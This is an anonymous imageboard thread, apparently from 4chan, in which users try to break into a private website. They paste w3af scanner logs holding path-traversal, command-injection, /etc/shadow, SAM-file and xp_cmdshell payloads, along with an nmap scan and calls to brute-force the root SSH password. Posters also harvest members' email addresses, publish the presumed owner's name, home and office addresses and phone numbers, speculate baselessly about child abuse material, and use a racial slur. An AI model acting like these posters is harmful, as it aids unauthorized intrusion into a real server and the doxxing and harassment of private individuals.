any one have any ideas on this

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
The remote network has an active filter. IMPORTANT: The result of all the other plugins will be unaccurate, web applications could be vulnerable but "protected" by the active filter.
[09/23/11 02:27:59] The following URLs were filtered:
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=..%2F..%2F..%2F..%2Fetc%2Fpasswd
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=id%3Buname+-a
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=%3C%3F+passthru%28%22id%22%29%3B%3F%3E
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%2Bc%3A%5C
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=type%2Bc%3A%5Cwinnt%5Crepair%5Csam._
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=ps+-aux%3B
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=..%2F..%2F..%2F..%2Fbin%2Fchgrp+nobody+%2Fetc%2Fshadow%7C
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=SELECT+TOP+1+name+FROM+sysusers
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=exec+master..xp_cmdshell+dir
[09/23/11 02:27:59] - http://mortis.com/root/?tuFSpMB=exec+xp_cmdshell+dir
[09/23/11 02:28:19] The page language is: en
[09/23/11 02:28:52] The most accurate fingerprint for this HTTP server is: "Apache/2.0.52 (Unix) PHP/5.0.3".

I was using w3af when I found this. you can varify if you want.

Stop trying to get into private message boards.

I bet you thought luelinks was a secret society of Illuminati too.

Bumping because I rather hope to find out whats inside. It's been a long process and I liked the people involved.

proof or gtfo

If you want access, find the person that owns it and ask them nicely.

owner has fake whois

lol it would be just too easy to do anything..

Starting Nmap 5.51 ( http://nmap.org ) at 2011-09-23 09:28 CEST
Nmap scan report for mortis.com (
Host is up (0.16s latency).
Not shown: 975 closed ports
21/tcp open ftp
22/tcp open ssh
25/tcp filtered smtp
26/tcp open rsftp
80/tcp open http
110/tcp open pop3
113/tcp open auth
143/tcp open imap
161/tcp filtered snmp
306/tcp open unknown
465/tcp open smtps
543/tcp open klogin
544/tcp open kshell
587/tcp open submission
646/tcp filtered ldp
993/tcp open imaps
995/tcp open pop3s
2105/tcp open eklogin
6667/tcp filtered irc
7000/tcp filtered afs3-fileserver
7001/tcp filtered afs3-callback
7007/tcp filtered afs3-bos
7777/tcp filtered cbt
9000/tcp filtered cslistener
31337/tcp filtered Elite

Nmap done: 1 IP address (1 host up) scanned in 17.68 seconds

huge ass usenet files that are password protected make me think its not just a private board

Then they obviously don't want to be bothered by curious neckbeards who post on 4chan about pseudoscience and paranoia garbage.

Leave them the fuck alone.

>Online backups
>Software development project
>CP ring
>Could be anything

Now, now. Not here to debate science and pseudoscience. Just trying to get into places we don't have access to. Call it curiosity.

Where the fuck are you finding those email addresses?

google, yahoo, gnz snif

Call it poking your nose into other people's lives.

Leave them alone or enjoy being a minor annoyance to a bunch of neckbeards.

could be anything , and thats why i want to know

>Mfw this is just a group of friends who made their own secret club website for communication and file sharing
>mfw they just slapped a big "mortis" on it because it was cool

I'm with that guy. It's better if you just leave people to themselves.

...and this is why it's better to not give your private site a domain name nor let it get indexed by Google.

OP, imagine if you were the guy running some private server and a bunch of 4chan retards started trying to break in.

where is everyone's sense of adventure and curiosity ?
i just popped over to the /x/ thread and im curious now

also >>20173666 trips 6s demands it

To freak people like you out and watch them try and break in and fail.

If I did something like that I would give them a chance to break in just so they would know how much time they wasted for nothing

it also might be something .... chances are it really is nothing but you never know ....

Oh god, has /x/ gotten better? I quit that place around a year and some change ago.
This peaks my interests. Unfortunately, I have to be up in 6 hours.

why do niggers always fucking do this?

protip: the word you're looking for is "piques"

It's 3 mother fucking AM, give me a break.
I now feel bad as a person who prides myself in grammar.
Also, upon further review, if I had worded it as "This interesting topic has caused a peak in my interest" it would've been grammatically correct.

Also: hold down the fort, and could care less. umad?

>tl;dr Thanks for the correction.

>This interesting topic has caused a peak in my interest
>implying your interest was being graphed by anyone that gave a shit about it besides yourself.

That's exactly why it's "pique" and not "peak."

Fair enough.
I'll be sure to be better rested the next time I decide to post so I'm less likely to produce grammatical errors, just for you Anon.

>"prides myself in grammar"
>"upon further review"
>tl,dr on a 4 line post
>convoluted sentence constructions
is english your native language?
you're like a 12 year old trying to sound smart.

loading up backtrack, I'm hooking up the VPN and going in guys.

Hopefully it's exploitable without too much work ;)

>inb4 skiddie fuck you okay if it works it works

opens popcorn bag.

Good luck, and fuck the haters.

has get exploits, use them, I can't

Yes, and I'm just sleepy and trying to sound smart.

This is a graph of how I make a dog over time.


anyone run acunetix on it?

Why do people get so butthurt about being corrected for poor grammar? I seriously don't understand.

>wonder why this faggot is trying so hard to save face on an anonymous image board
>realize he's a tripfag

cool filtered, bro

sorry for being a newfag, but wtf is a "get exploit"? I couldn't google it.

also look at their homepage source.
They must have an image server and core/index.html somewhere, and it doesn't look like those are listed in OP's post

somebody find the imgsrc and core/index.html

I wasn't really butthurt. I did thank you earlier, assuming you're >>20174045

Not like you'll be missing anything.

Not like you'll be missing anything.

someone just bruteforce their root password through the SSH port.

fukken idiots

What kind of encryption are they using on Usenet?

>> No.20174482

>root password

they do have one

>root password
Allowing root SSH logins
Allowing password authentication

That also reminds me of how Google was archiving groups like altblahblah.encryption.blahblah filled with encrypted files junk, but not the binaries groups.

Come on guys, just paste all the data you have on it and sit back for a second, get off your terminals and script GUIs.

Just fucking THINK for a second. What is the best way to attack a site like this?

delete system32

my contrib was stuff in op. gui crashed after. should have done it myself.

Okay, well there are 11 email addresses associated with it, and assuming those have a 1-1 correspondence with the members in the group, there are 11 unique users. That means it's a small group, which implies that it's not some large filesharing collective (unless they have subscriptions of some kind, but it doesn't look like they do).
Someone should send an official-sounding yet earnest PGP-signed email to a few of those members with a simple inquiry about the site.

The server is in Pittsburgh PA... somebody can fucking find that shit and break in..

all but 3 of the addresses are dead

which are the live ones and how do you know

>> No.20174569


We should google all of their usernames (as in [email protected]) to look for other accounts on other websites.

Also, notice that they all have the same relative theme... is this a necrophilia group?

They're probably just a Quake clan or something, lol.

>> No.20174586

great. Fucking TV shows. Either those are padding or this is a standard multimedia hub and we should all just go on with our business

tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 554 554 5.7.1

[email protected]
[email protected]
[email protected]
[email protected]
haven't errored back yet

of course the second after i post childe errors back

these are registered to the same guy:


>> No.20174639

I bet there's nothing behind these password walls.

>> No.20174640

>> No.20174650

haha so these are the guys running this shit
looks about right

well, there's no "mortis" registered on TorPM...

Thomas Ling
210 Post St. Ste. 812
San Francisco, CA 94108

[email protected]

Domain Name: MORTIS.COM

Administrative & Technical Contact:
Thomas Ling
2027 Van Ness Avenue
San Francisco, CA 94109

[email protected]
Thomas Ling
210 Post St. Ste. 812
San Francisco, CA 94108

[email protected]


Administrative & Technical Contact:
Thomas Ling
2027 Van Ness Avenue
San Francisco, CA 94109

[email protected]
Thomas Ling
210 Post St. Ste. 812
San Francisco, CA 94108

[email protected]

Domain Name: CTHULHU.NET

Administrative & Technical Contact:
Thomas Ling
2027 Van Ness Avenue
San Francisco, CA 94109

[email protected]

there are a few others i left out with the same pic of a chess piece or "dead but dreaming..."

interestingly there is a google quicksearch result for "thomas ling san francisco"

google maps comes up with some kind of commercial "virtual software" store

Found a couple more users with some identical files

The Domain on the email for https://www.binsearch.info/?max=250&g=alt.binaries.hdtv&a=lefko+%3Clefko%40lefkios.com%3E leads to the website for soundtech securities http://lefkios.com/

The Domain for https://www.binsearch.info/?max=250&g=alt.binaries.hdtv&a=nonent+%3Cnonent%40non.com%3E leads http://non.com/
Thomas Ling
210 Post St. Ste. 812
San Francisco, CA 94108



Administrative & Technical Contact:
Thomas Ling
2027 Van Ness Avenue
San Francisco, CA 94109

also :

(888) 874-1118 ext. 1
(415) 931-9500
(415) 704-3077
[email protected]


Monday through Friday, 7am to 6pm PST
(888) 874-1118 ext. 2
[email protected]
(Searchable knowledgebase and 24-hour trouble ticket support)

so whats their site about and why do you care?

damn, well there is a thomas ling dentist in SF, but what the fuck is mortis.com then?

Thomas Ling's Overview

Owner at DFI Inc
UOP Dental
8 connections
Thomas Ling's Experience

Medical Practice industry
Currently holds this position

DFI = dental fill ins

maybe its a cache of dental torture videos

Hosted on the same IP

but "mortis" refers to death, not to pain/torture.

dental torture leading to death ? rogue dentists trying to take down the ada ? i need sleep...

Found some downloads posted by this guy. Gibberish names at 25Gb.
drivecrazy3dbd25.par2 without password.
Someone with fast internets could help out?

vote to archive http://chanarchive.org/ submitted

looks boring, bros

brb registering cryptic domain name with single password protected page to troll /x/ & /g/

u amd?

Yes. I'm very amd.

Are you really that retarded?

good, stay amd

Tweeting about how amd I am right now, thanks.

>google all of their usernames

Here's a few possible related hits

>so whats their site about and why do you care?

We don't know what their site's about, and that's exactly why we care.

>> No.20176201

>> No.20176211

